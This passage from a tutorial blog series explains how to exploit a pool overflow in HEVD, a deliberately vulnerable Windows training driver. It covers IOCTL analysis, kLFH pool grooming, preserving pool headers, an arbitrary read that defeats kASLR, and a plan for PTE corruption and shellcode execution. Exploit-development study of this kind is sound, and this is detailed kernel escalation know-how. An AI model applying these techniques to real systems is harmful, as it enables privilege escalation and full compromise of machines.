This is the result of our out-of-bounds write vulnerability, which has corrupted a pool header. When a pool header is corrupted and the chunk is subsequently freed, an β€œintegrity” check is performed on the in-scope pool chunk to ensure it has a valid header. Because we have arbitrarily written contents past the pool chunk allocated for our buffer sent from user mode, we have subsequently overwritten other pool chunks. Due to this, and due to every chunk in the kLFH, which is where our allocation resides based on heuristics mentioned in Part 1, being prepended with a _POOL_HEADER structure - we have subsequently corrupted the header of each subsequent chunk. We can confirm this by setting a breakpoint on on call to ExAllocatePoolWithTag and enabling debug printing to see the layout of the pool before the free occurs.

The breakpoint set on the address fffff80d397561de, which is the first breakpoint seen being set in the above photo, is a breakpoint on the actual call to ExAllocatePoolWithTag. The breakpoint set at the address fffff80d39756336 is the instruction that comes directly before the call to ExFreePoolWithTag. This breakpoint is hit at the bottom of the above photo via Breakpoint 3 hit. This is to ensure execution pauses before the chunk is freed.

We can then inspect the vulnerable chunk responsible for the overflow to determine if the _POOL_HEADER tag corresponds with the chunk, which it does.

After letting execution resume, a bug check again incurs. This is due to a pool chunk being freed which has an invalid header.

This validates that an out-of-bounds write does exist. The question is now, with a kASLR bypass in hand - how to we comprehensively execute kernel-mode code from user mode?

Exploitation Strategy

Fair warning - this section contains a lot code analysis to understand what this driver is doing in order to groom the pool, so please bear this in mind.

As you can recall from Part 1, the key to pool exploitation in the age of the segment heap it to find objects, when exploiting the kLFH specifically, that are of the same size as the vulnerable object, contain an interesting member in the object, can be called from user mode, and are allocated on the same pool type as the vulnerable object. We can recall earlier that the size of the vulnerable object was 16 bytes in size. The goal here now is to look at the source code of the driver to determine if there isn’t a useful object that we can allocate which will meet all of the specified parameters above. Note again, this is the toughest part about pool exploitation is finding objects worthwhile.

Luckily, and slightly contrived, there are two files called ArbitraryReadWriteHelperNonPagedPoolNx.c and ArbitraryReadWriteHelperNonPagedPoolNx.h, which are useful to us. As the name can specify, these files seem to allocate some sort of object on the NonPagedPoolNx. Again, note that at this point in the real world we would need to reverse engineer the driver and look at all instances of pool allocations, inspect their arguments at runtime, and see if there isn’t a way to get useful objects on the same pool and kLFH bucket as the vulnerable object for pool grooming.

ArbitraryReadWriteHelperNonPagedPoolNx.h contains two interesting structures, seen below, as well several function definitions (which we will touch on later - please make sure you become familiar with these structures and their members!).

As we can see, each function definition defines a parameter of type PARW_HELPER_OBJECT_IO, which is a pointer to an ARW_HELP_OBJECT_IO object, defined in the above image!

Let’s examine ArbitraryReadWriteHelpeNonPagedPoolNx.c in order to determine how these ARW_HELPER_OBJECT_IO objects are being instantiated and leveraged in the defined functions in the above image.

Looking at ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see it contains several IOCTL handlers. This is indicative that these ARW_HELPER_OBJECT_IO objects will be sent from a client (us). Let’s take a look at the first IOCTL handler.

It appears that ARW_HELPER_OBJECT_IO objects are created through the CreateArbitraryReadWriteHelperObjectNonPagedPoolNxIoctlHandler IOCTL handler. This handler accepts a buffer, casts the buffer to type ARW_HELP_OBJECT_IO and passes the buffer to the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Let’s inspect CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

CreateArbitraryReadWriteHelperObjectNonPagedPoolNx first declares a few things:

  1. A pointer called Name
  2. A SIZE_T variable, Length
  3. An NTSTATUS variable which is set to STATUS_SUCCESS for error handling purposes
  4. An integer, FreeIndex, which is set to the value STATUS_INVALID_INDEX
  5. A pointer of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, called ARWHelperObject, which is a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we saw previously defined in ArbitraryReadWriteHelperNonPagedPoolNx.h.

The function, after declaring the pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX previously mentioned, probes the input buffer from the client, parsed from the IOCTL handler, to verify it is in user mode and then stores the length specified by the ARW_HELPER_OBJECT_IO structure’s Length member into the previously declared variable Length. This ARW_HELPER_OBJECT_IO structure is taken from the user mode client interacting with the driver (us), meaning it is supplied from the call to DeviceIoControl.

Then, a function called GetFreeIndex is called and the result of the operation is stored in the previously declared variable FreeIndex. If the return value of this function is equal to STATUS_INVALID_INDEX, the function returns the status to the caller. If the value is not STATUS_INVALID_INDEX, CreateArbitraryReadWriteHelperObjectNonPagedPoolNx then calls ExAllocatePoolWithTag to allocate memory for the previously declared PARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointer, which is called ARWHelperObject. This object is placed on the NonPagedPoolNx, as seen below.

After allocating memory for ARWHelperObject, the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then allocates another chunk from the NonPagedPoolNx and allocates this memory to the previously declared pointer Name.

This newly allocated memory is then initialized to zero. The previously declared pointer, ARWHelperObject, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT, then has its Name member set to the previously declared pointer Name, which had its memory allocated in the previous ExAllocatePoolWithTag operation, and its Length member set to the local variable Length, which grabbed the length sent by the user mode client in the IOCTL operation, via the input buffer of type ARW_HELPER_OBJECT_IO, as seen below. This essentially just initializes the structure’s values.

Then, an array called g_ARWHelperOjbectNonPagedPoolNx, at the index specified by FreeIndex, is initialized to the address of the ARWHelperObject. This array is actually an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, and managed such objects. This is defined at the beginning of ArbitraryReadWriteHelperNonPagedPoolNx.c, as seen below.

Before moving on - I realize this is a lot of code analysis, but I will add in diagrams and tl;dr’s later to help make sense of all of this. For now, let’s keep digging into the code.

Let’s recall how the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function was prototyped:

    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo

This HelperObjectIo object is of type PARW_HELPER_OBJECT_IO, which is supplied by a user mode client (us). This structure, which is supplied by us via DeviceIoControl, has its HelperObjectAddress member set to the address of the ARWHelperObject previously allocated in CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. This essentially means that our user mode structure, which is sent to kernel mode, has one of its members, HelperObjectAddress to be specific, set to the address of another kernel mode object. This means this will be bubbled back up to user mode. This is the end of the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function! Let’s update our code to see how this looks dynamically. We can also set a breakpoint on HEVD!CreateArbitraryReadWriteHelperObjectNonPagedPoolNx in WinDbg. Note that the IOCTL to trigger CreateArbitraryReadWriteHelperObjectNonPagedPoolNx is 0x00222063.

We know now that this function will allocate a pool chunk for the ARWHelperObject pointer, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on the call to ExAllocatePoolWIthTag responsible for this, and enable debug printing.

Also note the debug print Name Length is zero. This value was supplied by us from user mode, and since we instantiated the buffer to zero, this is why the length is zero. The FreeIndex is also zero. We will touch on this value later on. After executing the memory allocation operation and inspecting the return value, we can see the familiar Hack pool tag, which is 0x10 bytes (16 bytes) + 0x10 bytes for the _POOL_HEADER_ structure - making this a total of 0x20 bytes. The address of this ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is 0xffff838b6e6d71b0.

We then know that another call to ExAllocatePoolWithTag will occur, which will allocate memory for the Name member of ARWHelperObject->Name, where ARWHelperObject is of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on this memory allocation operation and inspect the contents of the operation.

We can see this chunk is allocated in the same pool and kLFH bucket as the previous ARWHelperObject pointer. The address of this chunk, which is 0xffff838b6e6d73d0, will eventually be set as ARWHelperObject’s Name member, along with ARWHelperObject’s Length member being set to the original user mode input buffer’s Length member, which comes from an ARW_HELPER_OBJECT_IO structure.

From here we can press g in WinDbg to resume execution.

We can clearly see that the kernel-mode address of the ARWHelperObject pointer is bubbled back to user mode via the HelperObjectAddress of the ARW_HELPER_OBJECT_IO object specified in the input and output buffer parameters of the call to DeviceIoControl.

Let’s re-execute everything again and capture the output.

Notice anything? Each time we call CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, based on the analysis above, there is always a PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT created. We know there is also an array of these objects created and the created object for each given CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function call is assigned to the array at index FreeIndex. After re-running the updated code, we can see that by calling the function again, and therefore creating another object, the FreeIndex value was increased by one. Re-executing everything again for a second time, we can see this is the case again!

We know that this FreeIndex variable is set via a function call to the GetFreeIndex function, as seen below.

Length = HelperObjectIo->Length;

        DbgPrint("[+] Name Length: 0x%X\n", Length);

        // Get a free index

        FreeIndex = GetFreeIndex();

        if (FreeIndex == STATUS_INVALID_INDEX)
            // Failed to get a free index

            Status = STATUS_INVALID_INDEX;
            DbgPrint("[-] Unable to find FreeIndex: 0x%X\n", Status);

            return Status;

Let’s examine how this function is defined and executed. Taking a look in ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see the function is defined as such.

This function, which returns an integer value, performs a for loop based on MAX_OBJECT_COUNT to determine if the g_ARWHelperObjectNonPagedPoolNx array, which is an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NXs, has a value assigned for a given index, which starts at 0. For instance, the for loop first checks if the 0th element in the g_ARWHelperObjectNonPagedPoolNx array is assigned a value. If it is assigned, the index into the array is increased by one. This keeps occurring until the for loop can no longer find a value assigned to a given index. When this is the case, the current value used as the counter is assigned to the value FreeIndex. This value is then passed to the assignment operation used to assign the in-scope ARWHelperObject to the array managing all such objects. This loop occurs MAX_OBJECT_COUNT times, which is defined in ArbitraryReadWriteHelperNonPagedPoolNx.h as #define MAX_OBJECT_COUNT 65535. This is the total amount of objects that can be managed by the g_ARWHelperObjectNonPagedPoolNx array.

The tl;dr of what happens here is in the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function is:

  1. Create a PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT object called ARWHelperObject
  2. Set the Name member of ARWHelperObject to a buffer on the NonPagedPoolNx, which has a value of 0
  3. Set the Length member of ARWHelperObject to the value specified by the user-supplied input buffer via DeviceIoControl
  4. Assign this object to an array which manages all active PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT objects
  5. Return the address of the ARWHelpeObject to user mode via the output buffer of DeviceIoControl

Here is a diagram of this in action.

Let’s take a look at the next IOCTL handler after CreateArbitraryReadWriteHelperObjectNonPagedPoolNx which is SetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler. This IOCTL handler will take the user buffer supplied by DeviceIoControl, which is expected to be of type ARW_HELPER_OBJECT_IO. This structure is then passed to the function SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, which is prototyped as such:

    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo

Let’s take a look at what this function will do with our input buffer. Recall last time we were able to specify the length that was used in the operation on the size of the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object ARWHelperObject. Additionally, we were able to return the address of this pointer to user mode.

This function starts off by defining a few variables:

  1. A pointer named Name
  2. A pointer named HelperObjectAddress
  3. An integer value named Index which is assigned to the status STATUS_INVALID_INDEX
  4. An NTSTATUS code

After these values are declared, This function first checks to make sure the input buffer from user mode, the ARW_HELPER_OBJECT_IO pointer, is in user mode. After confirming this, The Name member, which is a pointer, from this user mode buffer is stored into the pointer Name, previously declared in the listing of declared variables. The HelperObjectAddress member from the user mode buffer - which, after the call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, contained the kernel mode address of the PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT ARWHelperObject, is extracted and stored into the declared HelperObjectAddress at the beginning of the function.

A call to GetIndexFromPointer is made, with the address of the HelperObjectAddress as the argument in this call. If the return value is STATUS_INVALID_INDEX, an NTSTATUS code of STATUS_INVALID_INDEX is returned to the caller. If the function returns anything else, the Index value is printed to the screen.

Where does this value come from? GetIndexFromPointer is defined as such.

This function will accept a value of any pointer, but realistically this is used for a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. This function takes the supplied pointer and indexes the array of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers, g_ARWHelperObjectNonPagedPoolNx. If the value hasn’t been assigned to the array (e.g. if CreateArbitraryReadWriteHelperObjectNonPagedPoolNx wasn’t called, as this will assign any created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX to the array or the object was freed), STATUS_INVALID_INDEX is returned. This function basically makes sure the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is managed by the array. If it does exist, this function returns the index of the array the given object resides in.

Let’s take a look at the next snipped of code from the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

After confirming the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX exists, a check is performed to ensure the Name pointer, which was extracted from the user mode buffer of type PARW_HELPER_OBJECT_IO’s Name member, is in user mode. Note that g_ARWHelperObjectNonPagedPoolNx[Index] is being used in this situation as another way to reference the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, since all g_ARWHelperObjectNonPagedPoolNx is at the end of the day is an array, of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers.

After confirming the buffer is coming from user mode, this function finishes by copying the value of Name, which is a value supplied by us via DeviceIoControl and the ARW_HELPER_OBJECT_IO object, to the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

Let’s test this theory in WinDbg. What we should be looking for here is the value specified by the Name member of our user-supplied ARW_HELPER_OBJECT_IO should be written to the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created in the previous call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Our updated code looks as follows.

The above code should overwrite the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Note that the IOCTL for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x00222067.

We can then set a breakpoint in WinDbg to perform dynamic analysis.

Then we can set a breakpoint on ProbeForRead, which will take the first argument, which is our user-supplied ARW_HELPER_OBJECT_IO, and verify if it is in user mode. We can parse this memory address in WinDbg, which would be in RCX when the function call occurs due to the __fastcall calling convention, and see that this not only is a user-mode buffer, but it is also the object we intended to send from user mode for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

This HelperObjectAddress value is the address of the previously created/associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. We can also verify this in WinDbg.

Recall from earlier that the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object has it’s Length member taken from the Length sent from our user-mode ARW_HELPER_OBJECT_IO structure. The Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is also initialized to zero, per the RtlFillMemory call from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx routine - which initializes the Name buffer to 0 (recall the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is actually a buffer that was allocated via ExAllocatePoolWithTag by using the specified Length of our ARW_HELPER_OBJECT_IO structure in our DeviceIoControl call).

ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is the member that should be overwritten with the contents of the ARW_HELPER_OBJECT_IO object we sent from user mode, which currently is set to 0x4141414141414141. Knowing this, let’s set a breakpoint on the RtlCopyMemory routine, which will show up as memcpy in HEVD via WinDbg.

This fails. The error code here is actually access denied. Why is this? Recall that there is a one final call to ProbeForRead directly before the memcpy call.


The Name variable here is extracted from the user-mode buffer ARW_HELPER_OBJECT_IO. Since we supplied a value of 0x4141414141414141, this technically isn’t a valid address and the call to ProbeForRead will not be able to locate this address. Instead, let’s create a user-mode pointer and leverage it instead!

After executing the code again and hitting all the breakpoints, we can see that execution now reaches the memcpy routine.

After executing the memcpy routine, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function now points to the value specified by our user-mode buffer, 0x4141414141414141.

We are starting to get closer to our goal! You can see this is pretty much an uncontrolled arbitrary write primitive in and of itself. The issue here however is that the value we can overwrite, which is ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is a pointer which is allocated in the kernel via ExAllocatePoolWithTag. Since we cannot directly control the address stored in this member, we are limited to only overwriting what the kernel provides us. The goal for us will be to use the pool overflow vulnerability to overcome this (in the future).

Before getting to the exploitation phase, we need to investigate one more IOCTL handler, plus the IOCTL handler for deleting objects, which should not be time consuming.

The last IOCTL handler to investigate is the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler IOCTL handler.

This handler passes the user-supplied buffer, which is of type ARW_HELPER_OBJECT_IO to GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx. This function is identical to the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function, in that it will copy one Name member to another Name member, but in reverse order. As seen below, the Name member used in the destination argument for the call to RtlCopyMemory is from the user-supplied buffer this time.

This means that if we used the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function to overwrite the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then we could use the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx to get the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object and bubble it up back to user mode. Let’s modify our code to outline this. The IOCTL code to reach the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x0022206B.

In this case we do not need WinDbg to validate anything. We can simply set the contents of our ARW_HELPER_OBJECT_IO.Name member to junk as a POC that after the IOCL call to reach GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, this member will be overwritten by the contents of the associated/previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which will be 0x4141414141414141.

Since tempBuffer is assigned to ARW_HELPER_OBJECT_IO.Name, this is technically the value that will inherit the contents of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name in the memcpy operation from the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function. As we can see, we can successfully retrieve the contents of the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name object. Again, however, the issue is that we are not able to choose what ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name points to, as this is determined by the driver. We will use our pool overflow vulnerability soon to overcome this limitation.

The last IOCTL handler is the delete operation, found in DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler.

This IOCTL handler parses the input buffer from DeviceIoControl as an ARW_HELPER_OBJECT_IO structure. This buffer is then passed to the DeleteArbitraryReadWriteHelperObjecNonPagedPoolNx function.

This function is pretty simplistic - since the HelperObjectAddress is pointing to the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, this member is used in a call to ExAllocateFreePoolWithTag to free the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Additionally, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member, which also is allocated by ExAllocatePoolWithTag is freed.

Now that we know all of the ins-and-outs of the driver’s functionality, we can continue (please note that we are fortunate to have source code in this case. Leveraging a disassembler make take a bit more time to come to the same conclusions we were able to come to).

Okay, Now Let’s Get Into Exploitation (For Real This Time)

We know that our situation currently allows for an uncontrolled arbitrary read/write primitive. This is because the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member is set currently to the address of a pool allocation via ExAllocatePoolWithTag. With our pool overflow we will try to overwrite this address to a meaningful address. This will allow for us to corrupt a controlled address - thus allowing us to obtain an arbitrary read/write primitive.

Our strategy for grooming the pool, due to all of these objects being the same size and being allocated on the same pool type (NonPagedPoolNx), will be as follows:

  1. β€œFill the holes” in the current page servicing allocations of size 0x20
  3. Leverage the read/write primitive to write our shellcode, one QWORD at a time, to KUSER_SHARED_DATA+0x800 and flip the no-eXecute bit to bypass kernel-mode DEP

Recall earlier the sentiment about needing to preserve _POOL_HEADER structures? This is where everything goes full circle for us. Recall from Part 1 that the kLFH still uses the legacy _POOL_HEADER structures to process and store metadata for pool chunks. This means there is no encoding going on, and it is possible to hardcode the header into the exploit so that when the pool overflow occurs we can make sure when the header is overwritten it is overwritten with the same content as before.

Let’s inspect the value of a _POOL_HEADER of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we would be overflowing into.

Since this chunk is 16 bytes and will be part of the kLFH, it is prepended with a standard _POOL_HEADER structure. Since this is the case, and there is no encoding, we can simply hardcode the value of the _POOL_HEADER (recall that the _POOL_HEADER will be 0x10 bytes before the value returned by ExAllocatePoolWithTag). This means we can hardcode the value 0x6b63614802020000 into our exploit so that at the time of the overflow into the next chunk, which should be into one of these ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects we have previously sprayed, the first 0x10 bytes that are overflown of this chunk, which will be the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX’s _POOL_HEADER, will be preserved and kept as valid, bypassing the earlier issue shown when an invalid header occurs.

Knowing this, and knowing we have a bit of work to do, let’s rearrange our current exploit to make it more logical. We will create three functions for grooming:

  1. fillHoles()
  2. groomPool()
  3. pokeHoles()

These functions can be seen below.




Please refer to Part 1 to understand what this is doing, but essentially this technique will fill any fragments in the corresponding kLFH bucket in the NonPagedPoolNx and force the memory manager to (theoretically) give us a new page to work with. We then fill this new page with objects we control, e.g. the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects

Since we have a controlled pool-based overflow, the goal will be to overwrite any of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structures with the β€œvulnerable chunk” that copies memory into the allocation, without any bounds checking. Since the vulnerable chunk and the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX chunks are of the same size, they will both wind up being adjacent to each other theoretically, since they will land in the same kLFH bucket.

The last function, called readwritePrimitive() contains most of the exploit code.

The first bit of this function creates a β€œmain” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via an ARW_HELPER_OBJECT_IO object, and performs the filling of the pool chunks, fills the new page with objects we control, and then frees every other one of these objects.

After freeing every other object, we then replace these freed slots with our vulnerable buffers. We also create a β€œstandalone/main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Also note that the pool header is 16 bytes in size, meaning it is 2 QWORDS, hence β€œPadding”.

What we actually hope to do here, is the following.

We want to use a controlled write to only overwrite the first member of this adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, Name. This is because we have additional primitives to control and return these values of the Name member as shown in this blog post. The issue we have had so far, however, is the address of the Name member of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is completely controlled by the driver and cannot be influenced by us, unless we leverage a vulnerability (a la pool overflow).

As shown in the readwritePrimitive() function, the goal here will be to actually corrupt the adjacent chunk(s) with the address of the β€œmain” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we will manage via ARW_HELPER_OBJECT_IO.HelperObjectAddress. We would like to corrupt the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a precise overflow to corrupt the Name value with the address of our β€œmain” object. Currently this value is set to 0x9090909090909090. Once we prove this is possible, we can then take this further to obtain the eventual read/write primitive.

Setting a breakpoint on the TriggerBufferOverflowNonPagedPoolNx routine in HEVD.sys, and setting an additional breakpoint on the memcpy routine, which performs the pool overflow, we can investigate the contents of the pool.

As seen in the above image, we can clearly see we have flooded the pool with controlled ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, as well as the β€œcurrent” chunk - which refers to the vulnerable chunk used in the pool overflow. All of these chunks are prefaced with the Hack tag.

Then, after stepping through execution until the mempcy routine, we can inspect the contents of the next chunk, which is 0x10 bytes after the value in RCX, which is used in the destination for the memory copy operation. Remember - our goal is to overwrite the adjacent pool chunks. Stepping through the operation to clearly see that we have corrupted the next pool chunk, which is of type ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

We can validate that the address which was written out-of-bounds is actually the address of the β€œmain”, standalone ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object we created.

Remember - a _POOL_HEADER structure is 0x10 bytes in length. This makes every pool chunk within this kLFH bucket 0x20 bytes in total size. Since we want to overflow adjacent chunks, we need to preserve the pool header. Since we are in the kLFH, we can just hardcode the pool header, as we have proven, to satisfy the pool and to avoid any crashes which may arise as a result of an invalid pool chunk. Additionally, we can corrupt the first 0x10 bytes of the value in RCX, which is the destination address in the memory copy operation, because there are 0x20 bytes in the β€œvulnerable” pool chunk (which is used in the copy operation). The first 0x10 bytes are the header and the second half we actually don’t care about, as we are worried about corrupting an adjacent chunk. Because of this, we can set the first 0x10 bytes of our copy, which writes out of bounds, to 0x10 to ensure that the bytes which are copied out of bounds are the bytes that comprise the pool header of the next chunk.

We have now successfully performed out out-of-bounds write via a pool overflow, and have corrupted an adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object’s Name member, which is dynamically allocated on the pool before had and has an address we do not control, unless we use a vulnerability such as an out-of-bounds write, with an address we do control, which is the address of the object created previously.

Arbitrary Read Primitive

Although it may not be totally apparent currently, our exploit strategy revolves around our ability to use our pool overflow to write out-of-bounds. Recall that the β€œSet” and β€œGet” capabilities in the driver allow us to read and write memory, but not at controlled locations. The location is controlled by the pool chunk allocated for the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

Let’s take a look at the corrupted ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. The corrupted object is one of the many sprayed objects. We successfully overwrote the Name member of this object with the address of the β€œmain”, or standalone ARE_HELPER_OBJECT_NON_PAGED_POOL_NX object.

We know that it is possible to set the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structure via the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function through an IOCTL invocation. Since we are now able to control the value of Name in the corrupted object, let’s see if we can’t abuse this through an arbitrary read primitive.

Let’s break this down. We know that we currently have a corrupted object with a Name member that is set to the value of another object. For brevity, we can recall this from the previous image.

If we do a β€œSet” operation currently on the corrupted object, shown in the dt command and currently has its Name member set to 0xffffa00ca378c210, it will perform this operation on the Name member. However, we know that the Name member is actually currently set to the value of the β€œmain” object via the out-of-bounds write! This means that performing a β€œSet” operation on the corrupted object will actually take the address of the main object, since it is set in the Name member, dereference it, and write the contents specified by us. This will cause our main object to then point to whatever we specify, instead of the value of ffffa00ca378c3b0 currently outlined in the memory contents shown by dq in WinDbg. How does this turn into an arbitrary read primitive? Since our β€œmain” object will point to whatever address we specify, the β€œGet” operation, if performed on the β€œmain” object, will then dereference this address specified by us and return the value!

In WinDbg, we can β€œmimic” the β€œSet” operation as shown.

Performing the β€œSet” operation on the corrupted object will actually set the value of our main object to whatever is specified to the user, due to us corrupting the previous random address with the pool overflow vulnerability. At this point, performing the β€œGet” operation on our main object, since it was set to the value specified by the user, would dereference the value and return it to us!

At this point we need to identify what out goal is. To comprehensively bypass kASLR, our goal is as follows:

  1. Use the base address of HEVD.sys from the original exploit in part one to provide the offset to the Import Address Table
  2. Supply an IAT entry that points to ntoskrnl.exe to the exploit to be arbitrarily read from (thus obtaining a pointer to ntoskrnl.exe)
  3. Calculate the distance from the pointer to the kernel to obtain the base

We can update our code to outline this. As you may recall, we have groomed the pool with 5000 ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects. However, we did not spray the pool with 5000 β€œvulnerable” objects. Since we have groomed the pool, we know that our vulnerable object we can arbitrarily write past will end up adjacent to one of the objects used for grooming. Since we only trigger the overflow once, and since we have already set Name values on all of the objects used for grooming, a value of 0x9090909090909090, we can simply use the β€œGet” operation in order to view each Name member of the objects used for grooming. If one of the objects does not contain NOPs, this is indicative that the pool overflow outlined previously to corrupt the Name value of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX has succeeded.

After this, we can then use the same primitive previously mentioned about now using the β€œSet” functionality in HEVD to set the Name member of the targeted corrupted object, which would actually β€œtrick” the program to overwrite the Name member of the corrupted object, which is actually the address of the β€œstandalone”/main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. The overwrite will dereference the standalone object, thus allowing for an arbitrary read primitive since we have the ability to then later use the β€œGet” functionality on the main object later.

We then can add a β€œpress enter to continue” function to our exploit to pause execution after the main object is printed to the screen, as well as the corrupted object used for grooming that resides within the 5000 objects used for grooming.

We then can take the address 0xffff8e03c8d5c2b0, which is the corrupted object, and inspect it in WinDbg. If all goes well, this address should contain the address of the β€œmain” object.

Comparing the Name member to the previous screenshot in which the exploit with the β€œpress enter to continue” statement is in, we can see that the pool corruption was successful and that the Name member of one of the 5000 objects used for grooming was overwritten!

Now, if we were to use the β€œSet” functionality of HEVD and supply the ARW_HELPER_OBJECT_NON_PAGED_POOL object that was corrupted and also used for grooming, at address 0xffff8e03c8d5c2b0, HEVD would use the value stored in Name, dereference it, and overwrite it. This is because HEVD is expecting one of the pool allocations previously showcased for Name pointers, which we do not control. Since we have supplied another address, what HEVD will actually do is perform the overwite, but this time it will overwrite the pointer we supplied, which is another ARW_HELPER_OBJECT_NON_PAGED_POOL. Since the first member of one of these objects has a member Name, what will happen is that HEVD will actually write whatever we supply to the Name member of our main object! Let’s view this in WinDbg.

As our exploit showcased, we are using HEVD+0x2038 in this case. This value should be written to our main object.

As you can see, our main object now has its Name member pointing to HEVD+0x2038, which is a pointer to the kernel! After running the full exploit, we have now obtained the base address of HEVD from the previous exploit, and now the base of the kernel via an arbitrary read by way of pool overflow - all from low integrity!

The beauty of this technique of leveraging two objects should be clear now - we do not have to constantly perform overflows of objects in order to perform exploitation. We can now just simply use the main object to read!

Our exploitation technique will be to corrupt the page table entries of our eventual memory page our shellcode resides in. If you are not familiar with this technique, I have two blogs written on the subject, plus one about memory paging. You can find them here: one, two, and three.

For our purposes, we will need to following items arbitrarily read:

  1. nt!MiGetPteAddress+0x13 - this contains the base of the PTEs needed for calculations
  2. PTE bits that make up the shellcode page
  3. [nt!HalDispatchTable+0x8] - used to execute our shellcode. We first need to preserve this address by reading it to ensure exploit stability

Let’s add a routine to address the first issue, reading the base of the page table entries. We can calculate the offset to the function MiGetPteAddress+0x13 and then use our arbitrary read primitive.

